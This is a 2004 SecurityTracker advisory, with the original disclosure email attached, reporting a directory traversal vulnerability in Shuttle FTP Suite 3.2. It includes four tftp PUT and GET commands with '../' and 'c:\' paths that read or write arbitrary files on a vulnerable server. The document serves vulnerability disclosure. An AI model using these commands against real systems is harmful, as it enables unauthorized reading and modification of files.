Shuttle FTP Suite Lets Remote Users Read or Write Files
|
|
SecurityTracker Alert ID: 1010929
|
|
SecurityTracker URL: http://securitytracker.com/id?1010929
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 11 2004
|
Impact: Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
|
Exploit Included: Yes
|
Advisory: Global Security Solution IT (GSSIT)
|
Version(s): 3.2
|
Description: Ziv Kamir of Global Security Solution IT reported a directory traversal vulnerability in Shuttle FTP Suite. A remote user can read and write files on the target system.
It is reported that a remote user can use the following TFTP commands to write or read arbitrary files:
tftp -i [Server_IP] PUT
[FileName] ../[FileName]
tftp -i [Server_IP] PUT [FileName] c:\[FileName]
tftp -i [Server_IP] GET ../[FileName]
tftp -i
[Server_IP] GET c:\[FileName]
The vendor was reportedly notified on August 2, 2004 without response.
|
Impact: A remote user can read and write files on the target system with the privileges of the Shuttle FTP Suite.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.waveflow.com/shuttleftp/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Windows (Any)
|
Reported By: GSS IT <gss_it@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 11 Aug 2004 02:43:06 -0700 (PDT)
From: GSS IT <gss_it@yahoo.com>
Subject: Shuttle FTP Suite
|
--0-756502021-1092217386=:51310
Content-Type: multipart/alternative; boundary="0-1758303715-1092217386=:51310"
--0-1758303715-1092217386=:51310
Content-Type: text/plain; charset=us-ascii
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
--0-1758303715-1092217386=:51310
Content-Type: text/html; charset=us-ascii
<p>__________________________________________________<br>Do You Yahoo!?<br>Tired o
f spam? Yahoo! Mail has the best spam protection around <br>http://mail.yahoo.com
--0-1758303715-1092217386=:51310--
--0-756502021-1092217386=:51310
Content-Type: text/plain; name="ShuttleFTP.txt"
Content-Description: ShuttleFTP.txt
Content-Disposition: inline; filename="ShuttleFTP.txt"
11/08/04
====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Shuttle FTP Suite
Web Site: http://www.waveflow.com/shuttleftp/
Versions: 3.2
Platform: Windows
Bug: Directory Traversal
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Email : gss_it@yahoo.com #
# #
# #
#########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
Shuttle FTP Suite is the only Internet Suite that includes all these applications in one program.
It also has a very visual interface (similar to Windows Explorer) that makes it very easy to use.
======
2) Bug
======
Remote user can traverse the directory and retrieve And/Or write files on the system.
===========
3) The Code
===========
tftp -i [Server_IP] PUT [FileName] ../[FileName]
tftp -i [Server_IP] PUT [FileName] c:\[FileName]
tftp -i [Server_IP] GET ../[FileName]
tftp -i [Server_IP] GET c:\[FileName]
===========
4) The Fix
===========
Date of Vendor Notification:
02-08-04
Status:
No Response
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages.
==============================================================================================
--0-756502021-1092217386=:51310--
|
|
